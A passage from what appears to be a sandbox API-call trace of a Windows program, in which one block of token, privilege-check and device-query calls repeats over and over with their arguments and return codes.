ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.875] GetLastError () returned 0x578 [0016.875] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.875] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.875] GetCurrentThread () returned 0xfffffffe [0016.875] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.875] GetLastError () returned 0x3f0 [0016.875] GetCurrentProcess () returned 0xffffffff [0016.875] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.876] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.876] SetLastError (dwErrCode=0x522) [0016.876] CloseHandle (hObject=0x114) returned 1 [0016.876] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.876] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.876] GetLastError () returned 0x578 [0016.876] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.876] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.877] GetCurrentThread () returned 0xfffffffe [0016.877] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.877] GetLastError () returned 0x3f0 [0016.877] GetCurrentProcess () returned 0xffffffff [0016.877] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.877] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.877] SetLastError (dwErrCode=0x522) [0016.877] CloseHandle (hObject=0x114) returned 1 [0016.877] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.877] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.877] GetLastError () returned 0x578 [0016.877] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.877] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.877] GetCurrentThread () returned 0xfffffffe [0016.877] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.877] GetLastError () returned 0x3f0 [0016.877] GetCurrentProcess () returned 0xffffffff [0016.877] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.877] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.877] SetLastError (dwErrCode=0x522) [0016.877] CloseHandle (hObject=0x114) returned 1 [0016.877] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.877] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.877] GetLastError () returned 0x578 [0016.878] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.878] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.878] GetCurrentThread () returned 0xfffffffe [0016.878] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.878] GetLastError () returned 0x3f0 [0016.878] GetCurrentProcess () returned 0xffffffff [0016.878] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.878] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.878] SetLastError (dwErrCode=0x522) [0016.878] CloseHandle (hObject=0x114) returned 1 [0016.878] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.878] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.878] GetLastError () returned 0x578 [0016.878] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.878] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.878] GetCurrentThread () returned 0xfffffffe [0016.878] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.878] GetLastError () returned 0x3f0 [0016.878] GetCurrentProcess () returned 0xffffffff [0016.878] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.878] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.878] SetLastError (dwErrCode=0x522) [0016.878] CloseHandle (hObject=0x114) returned 1 [0016.878] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.878] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.878] GetLastError () returned 0x578 [0016.879] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.879] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.879] GetCurrentThread () returned 0xfffffffe [0016.879] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.879] GetLastError () returned 0x3f0 [0016.879] GetCurrentProcess () returned 0xffffffff [0016.879] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.879] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.879] SetLastError (dwErrCode=0x522) [0016.879] CloseHandle (hObject=0x114) returned 1 [0016.879] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.879] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.879] GetLastError () returned 0x578 [0016.879] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.879] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.879] GetCurrentThread () returned 0xfffffffe [0016.879] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.879] GetLastError () returned 0x3f0 [0016.879] GetCurrentProcess () returned 0xffffffff [0016.879] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.879] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.879] SetLastError (dwErrCode=0x522) [0016.879] CloseHandle (hObject=0x114) returned 1 [0016.879] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.879] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.880] GetLastError () returned 0x578 [0016.880] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.880] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.880] GetCurrentThread () returned 0xfffffffe [0016.880] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.880] GetLastError () returned 0x3f0 [0016.880] GetCurrentProcess () returned 0xffffffff [0016.880] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.880] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.880] SetLastError (dwErrCode=0x522) [0016.880] CloseHandle (hObject=0x114) returned 1 [0016.880] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.880] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.880] GetLastError () returned 0x578 [0016.880] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.880] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.880] GetCurrentThread () returned 0xfffffffe [0016.880] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.880] GetLastError () returned 0x3f0 [0016.880] GetCurrentProcess () returned 0xffffffff [0016.880] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.880] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.880] SetLastError (dwErrCode=0x522) [0016.880] CloseHandle (hObject=0x114) returned 1 [0016.880] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.880] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.881] GetLastError () returned 0x578 [0016.881] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.881] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.881] GetCurrentThread () returned 0xfffffffe [0016.881] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.881] GetLastError () returned 0x3f0 [0016.881] GetCurrentProcess () returned 0xffffffff [0016.881] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.881] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.881] SetLastError (dwErrCode=0x522) [0016.881] CloseHandle (hObject=0x114) returned 1 [0016.881] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.881] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.881] GetLastError () returned 0x578 [0016.881] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.881] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.881] GetCurrentThread () returned 0xfffffffe [0016.881] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.881] GetLastError () returned 0x3f0 [0016.881] GetCurrentProcess () returned 0xffffffff [0016.881] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.881] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.881] SetLastError (dwErrCode=0x522) [0016.881] CloseHandle (hObject=0x114) returned 1 [0016.881] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.882] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.882] GetLastError () returned 0x578 [0016.882] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.882] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.882] GetCurrentThread () returned 0xfffffffe [0016.882] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.882] GetLastError () returned 0x3f0 [0016.882] GetCurrentProcess () returned 0xffffffff [0016.882] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.882] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.882] SetLastError (dwErrCode=0x522) [0016.882] CloseHandle (hObject=0x114) returned 1 [0016.882] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.882] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.882] GetLastError () returned 0x578 [0016.882] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.882] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.882] GetCurrentThread () returned 0xfffffffe [0016.882] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.882] GetLastError () returned 0x3f0 [0016.882] GetCurrentProcess () returned 0xffffffff [0016.882] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.882] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.882] SetLastError (dwErrCode=0x522) [0016.882] CloseHandle (hObject=0x114) returned 1 [0016.882] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.883] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.883] GetLastError () returned 0x578 [0016.883] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.883] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.883] GetCurrentThread () returned 0xfffffffe [0016.883] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.883] GetLastError () returned 0x3f0 [0016.883] GetCurrentProcess () returned 0xffffffff [0016.883] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.883] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.883] SetLastError (dwErrCode=0x522) [0016.883] CloseHandle (hObject=0x114) returned 1 [0016.883] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.883] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.883] GetLastError () returned 0x578 [0016.883] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.883] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.883] GetCurrentThread () returned 0xfffffffe [0016.883] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.883] GetLastError () returned 0x3f0 [0016.883] GetCurrentProcess () returned 0xffffffff [0016.883] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.883] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.883] SetLastError (dwErrCode=0x522) [0016.883] CloseHandle (hObject=0x114) returned 1 [0016.884] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.884] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.884] GetLastError () returned 0x578 [0016.884] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.884] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.884] GetCurrentThread () returned 0xfffffffe [0016.884] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.884] GetLastError () returned 0x3f0 [0016.884] GetCurrentProcess () returned 0xffffffff [0016.884] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.884] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.884] SetLastError (dwErrCode=0x522) [0016.884] CloseHandle (hObject=0x114) returned 1 [0016.884] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.884] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.884] GetLastError () returned 0x578 [0016.884] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.884] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.884] GetCurrentThread () returned 0xfffffffe [0016.884] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.884] GetLastError () returned 0x3f0 [0016.884] GetCurrentProcess () returned 0xffffffff [0016.884] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.884] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.884] SetLastError (dwErrCode=0x522) [0016.885] CloseHandle (hObject=0x114) returned 1 [0016.885] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.885] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.885] GetLastError () returned 0x578 [0016.885] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.885] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.885] GetCurrentThread () returned 0xfffffffe [0016.885] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.885] GetLastError () returned 0x3f0 [0016.885] GetCurrentProcess () returned 0xffffffff [0016.885] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.885] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.885] SetLastError (dwErrCode=0x522) [0016.885] CloseHandle (hObject=0x114) returned 1 [0016.885] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.885] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.885] GetLastError () returned 0x578 [0016.885] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.885] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.885] GetCurrentThread () returned 0xfffffffe [0016.885] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.885] GetLastError () returned 0x3f0 [0016.885] GetCurrentProcess () returned 0xffffffff [0016.885] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.885] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.885] SetLastError (dwErrCode=0x522) [0016.886] CloseHandle (hObject=0x114) returned 1 [0016.886] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.886] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.886] GetLastError () returned 0x578 [0016.886] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.886] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.886] GetCurrentThread () returned 0xfffffffe [0016.886] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.886] GetLastError () returned 0x3f0 [0016.886] GetCurrentProcess () returned 0xffffffff [0016.886] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.886] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.886] SetLastError (dwErrCode=0x522) [0016.886] CloseHandle (hObject=0x114) returned 1 [0016.886] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.886] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.886] GetLastError () returned 0x578 [0016.886] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.886] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.886] GetCurrentThread () returned 0xfffffffe [0016.886] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.886] GetLastError () returned 0x3f0 [0016.886] GetCurrentProcess () returned 0xffffffff [0016.886] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.886] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.887] SetLastError (dwErrCode=0x522) [0016.887] CloseHandle (hObject=0x114) returned 1 [0016.887] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.887] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.887] GetLastError () returned 0x578 [0016.887] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.887] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.887] GetCurrentThread () returned 0xfffffffe [0016.887] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.887] GetLastError () returned 0x3f0 [0016.887] GetCurrentProcess () returned 0xffffffff [0016.887] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.887] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.887] SetLastError (dwErrCode=0x522) [0016.887] CloseHandle (hObject=0x114) returned 1 [0016.887] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.887] CM_Get_Device_Interface_List_SizeA (in: 